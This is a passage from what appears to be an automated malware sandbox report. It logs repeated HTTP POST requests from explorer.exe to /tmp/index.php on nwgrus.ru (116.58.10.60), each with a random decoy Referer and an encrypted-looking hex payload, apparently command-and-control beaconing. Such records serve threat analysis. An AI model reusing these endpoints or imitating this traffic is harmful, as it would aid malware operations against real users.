                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu%CO4t'RsCg9ZX{YLWaJ;Ezj5R5`LL_M[iODB=gn[P`NDZ)M6v
                                                            Oct 11, 2024 06:37:42.807575941 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:42 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.450562116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:42.815881014 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://pmvtliwpktklau.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 301
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:42.815903902 CEST301OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 4e 43 b5 fc
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuNCZTpqhhX!2r-]<OMeM;bj//'qaN,~.\'GfhE-(@:GR$;
                                                            Oct 11, 2024 06:37:44.078490973 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:43 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.450563116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:44.086987019 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://faxctnknnkusgdi.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 285
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:44.087074041 CEST285OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 7e 02 f8 aa
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu~G7f.Zk}>[I(PV#&DFO5.J^YHao&.Sb(":xxh<W,jFQ(p
                                                            Oct 11, 2024 06:37:45.348758936 CEST137INHTTP/1.1 200 OK
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:45 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.450564116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:45.361881971 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://lsncadftghcgkll.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 258
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:45.361901045 CEST258OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 5c 0a ea 86
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu\l;G]4B>="Qt$FCuI\RVS1%1{!0=J&Z_lf)XA1{*CmS`SP`vy)N;
                                                            Oct 11, 2024 06:37:46.644383907 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:46 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.450565116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:46.651829004 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://lpydjvblecmmk.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 182
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:46.651843071 CEST182OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 77 46 ac e9
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuwFZ[qs:k4Tpr.uMxvgLbl/&bi4=u}8:NFL
                                                            Oct 11, 2024 06:37:47.887083054 CEST137INHTTP/1.1 200 OK
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:47 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.450566116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:47.895406008 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://iepqpqyryvhgtcv.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 145
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:47.895428896 CEST145OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 4c 34 e4 a9
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuL4\Hj'WUPujbu\JE;-R"#
                                                            Oct 11, 2024 06:37:49.175060987 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:48 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.450567116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:49.185616016 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://oenjfnfpfgckga.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 161
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:49.185630083 CEST161OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 38 49 e3 89
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu8Iq[MVDO`(lWnK2;T82AC8*!,
                                                            Oct 11, 2024 06:37:50.444509983 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:50 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.450568116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:50.457628965 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://nufhygmjiointcnq.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 225
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:50.457668066 CEST225OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 78 04 d3 fb
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuxhxw*l;zjsc47R8V)WPWR}hIHz2!#nD3;sY%,[Y6
                                                            Oct 11, 2024 06:37:51.736558914 CEST137INHTTP/1.1 200 OK
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:51 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.450569116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:51.745544910 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://hsidmskxdmqv.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 201
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:51.745570898 CEST201OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 64 30 d5 85
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vud0X?Gxcs6Ds <H.DSa'6u{U=l7Y.jxmH0yAiI0U
                                                            Oct 11, 2024 06:37:53.006021023 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:52 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.450570116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:53.014760971 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://tnccrjrkqwl.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 118
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:53.014760971 CEST118OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 59 1f ca 85
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuYTxx`93+2TA[
                                                            Oct 11, 2024 06:37:54.248764038 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:54 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.450571116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:54.259085894 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ttovpyftqljtjbyu.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 181
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:54.259109974 CEST181OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 59 3a db bb
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuY:_uvs{Pq"ubFuFe8/H?.HG>(9)s},x]D/
                                                            Oct 11, 2024 06:37:55.768132925 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:55 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
